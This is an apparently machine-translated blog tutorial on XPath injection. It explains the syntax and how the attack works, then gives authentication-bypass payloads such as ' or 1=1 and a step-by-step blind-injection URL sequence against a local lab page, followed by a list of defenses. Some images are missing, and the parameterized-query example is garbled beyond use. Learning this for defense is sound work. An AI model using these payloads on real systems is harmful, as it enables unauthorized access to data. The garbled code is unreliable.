XPath injection attack principle and defense

XPath injection attack principle and defense

0x01 What is XPath

XPath is the XML path language, which is the main element of the W3C XSLT standard. It is a language used to determine the location of a certain part of an XML (subset of standard universal markup language) document.

XPath is based on XML tree structure, there are different types of nodes, including element nodes, attribute nodes and text nodes, provides the ability to find nodes in the data structure tree, can be used to traverse the elements and attributes in the XML document.

0x02 XPath basic syntax

1. Query the basic statement
// users / user [name / text () = 'abc' and password / text () = 'test123'].
This is an XPath query statement to get all user data whose name is abc. The user needs to submit the correct name and password to return the result. If the hacker enters in the name field: 'or 1 = 1 and enters in the password:' or 1 = 1, the verification can be bypassed and all user data can be successfully obtained
// users / user [name / text () = '' or 1 = 1 and password / text () = '' or 1 = 1]

2. Node types
In XPath, XML documents are treated as node trees. There are seven types of nodes in XPath: elements, attributes, text, namespaces, processing instructions, comments, and document nodes (or become root nodes). The root node of the document is the document node; the corresponding attributes have attribute nodes, and the elements have element nodes.
element (
attribute)
text (text)
namespace (process namespace)
processing-instruction (processing instruction)
comment (comment)
root (root node)

3. Expression
XPath selects nodes by Path Expression, basic rules:
Insert picture description here

0x03 What is XPath injection attack

In recent years, XML technology has been widely used in modern e-commerce and shopping mall modernization systems, and XPath injection attack technology against XML data information has begun to appear. When XML information is widely used, the security of its data is very important, but few researchers currently study XPath's injection attack defense technology.

XPath injection attack refers to the use of XPath parser's loose input and fault-tolerant features, which can attach malicious XPath query codes to URLs, forms, or other information to obtain access to authority information and change these information. XPath injection attack is a new attack method for Web service applications. It allows an attacker to obtain the complete content of an XML document through XPath query without knowing the relevant knowledge of XPath query in advance.

0x04 XPath injection attack features

XPath injection attacks use two techniques, namely XPath scanning and XPath query Boolean. Through this attack, the attacker can control the XML database used for XPath queries. This kind of attack can effectively use XPath query (and XML database) to perform authentication, lookup or other operations. XPath injection attacks are similar to SQL injection attacks, but compared with SQL injection attacks, XPath has advantages in the following aspects.

(1) Extensiveness . XPath injection attacks use XPath syntax. Since XPath is a standard language, as long as a Web application that uses XPath syntax does not strictly process the input XPath query, there will be XPath injection vulnerabilities. This weakness is included in the implementation, which is very different from SQL injection attacks. Depending on the SQL language supported by the database during the SQL injection attack, the implementation of the injection attack may be different.

(2) Harmful . XPath language can refer to almost all parts of XML documents, and such references generally have no access control restrictions. However, in the SQL injection attack, the authority of a "user" may be restricted to a specific table, column, or query, and the XPath injection attack can guarantee to obtain a complete XML document, that is, a complete database. As long as Web service applications have basic security vulnerabilities, automatic attacks against XPath applications can be constructed.

0x05 Hazard of XPath injection

  1. Submit malicious XPath codes in URLs and forms to obtain access rights to restrict data and modify these data;
  2. The complete XML content of the system can be obtained through this type of vulnerability query.
  3. Logic and authentication are bypassed. It does not have various permissions like the database. XML does not have the concept of various permissions. Because there is no concept of permissions, the entire database will be read by users when using xpath to construct queries.
  4. Bypass verification, information leakage

0x06 XPath injection attack principle

The principle of xpath injection is actually very similar to SQL injection. XPath injection attacks are mainly through the construction of special inputs. These inputs are often some combination of XPath syntax. These inputs will be passed into the Web application as parameters and executed by executing XPath queries. The operation that the intruder wanted, however, the injected object is not the database users table, but an XML file that stores data.

The attacker can obtain the organizational structure of the XML data, or access data that is not normally allowed. If the XML data is used for user authentication, the attacker can elevate his authority. Because xpath does not have access control, we will not encounter many access restrictions that are often encountered in SQL injection. There is no access control or user authentication in XML. If the user has the authority to use XPath query, and there is no defense system in between or the query statement is not filtered by the defense system, then the user can access the entire XML document.

As a common example //users/user[username/text()= ' ' or ‘1’ or '1' and password/text()=''],
this string will logically make the query always return true and will always allow the attacker to access the system. Attackers can use XPath to dynamically manipulate XML documents in applications. After the attack is completed, the XPath blind entry technology can be used to obtain the highest authority account and other important document information. Extending it, there are still many tricks for xpath injection, such as xpath error injection through the updataxml () function, and xpath blind injection.

Blog.xml (storing user name and password)
Insert picture description here
Index.php (used to receive incoming parameters and conduct XML queries)
Insert picture description here
code is very simple, implements a simple login verification function. In fact, similar to SQL injection, there is no data entered by the user Doing filtering causes the attacker to directly inject the "XPath expression".
Insert picture description here

0x07 XPath blind injection method

XPath blind injection mainly uses some string operation functions and operators of XPath.
Insert picture description here

Taking the above part of the environment as an example, $query = "/root/users/user[username/text()='".$name."' and password/text()='".$pwd."']";if we want to traverse the entire XML document, the general steps are as follows:
1. Use count (/ *) to determine the following node:
http://127.0.0.1/xpath/index.php?name= ' or count (/ *) = 1 or '1' = '2
Result: 1If
there is a return result, it proves that there is a root node

2. Use substring to split each character of the root node and guess the first-level node:
http://127.0.0.1/xpath/index.php?name= 'or substring (name (/ [position () = 1]) , 1,1) = 'r' or '1' = '2
http://127.0.0.1/xpath/index.php?name=' or substring (name (/
[position () = 1]), 2, 1) = 'o' or '1' = '2

Result: root

3. Determine the number of root's next-level nodes:
http://127.0.0.1/xpath/index.php?name= 'or count (/ root / *) = 2 or' 1 '=' 2
Result: 1

4. Guess the next node of root:
http://127.0.0.1/xpath/index.php?name= 'or substring (name (/ root / [position () = 1]), 1,1) = 'u' or '1' = '2
http://127.0.0.1/xpath/index.php?name=' or substring (name (/ root /
[position () = 2]), 1,1) = ' s 'or' 1 '=' 2
Result: users

5. Repeat the above steps until all the nodes are guessed, and finally guess the data or attribute values ​​in the nodes

0x08 XPath injection attack defense technology

(1) Submit the data to the upper end of the server, and verify the validity of the submitted data before the server officially processes the batch of data.
(2) Check whether the submitted data contains special characters, perform code conversion or replacement on the special characters, and delete sensitive characters or character strings.
(3) For the error information that appears in the system, replace it with the IE error code information to shield the error information of the system itself.
(4) Parameterized XPath query, the XPath query expression that needs to be constructed is expressed in the form of a variable, and the variable is not a script that can be executed. The following code can parameterize the query by creating an external file that saves the query:
declare variable $ loginID as xs: string external;
declare variable p a s s w The r d a s x s s t r i n g e x t e r n a l / / in s e r s / in s e r [ @ l The g i n I D = password as xs:string external; //users/user[@loginID= loginID and @ password = $ password]
(5) Through encryption algorithms such as MD5, SSL, etc., for data sensitive information and encryption during data transmission, even if some illegal users obtain data packets through illegal methods, what they see is also encrypted Information.

Published 21 original articles · won 14 · visited 4075

Guess you like

Origin blog.csdn.net/m0_38103658/article/details/105481323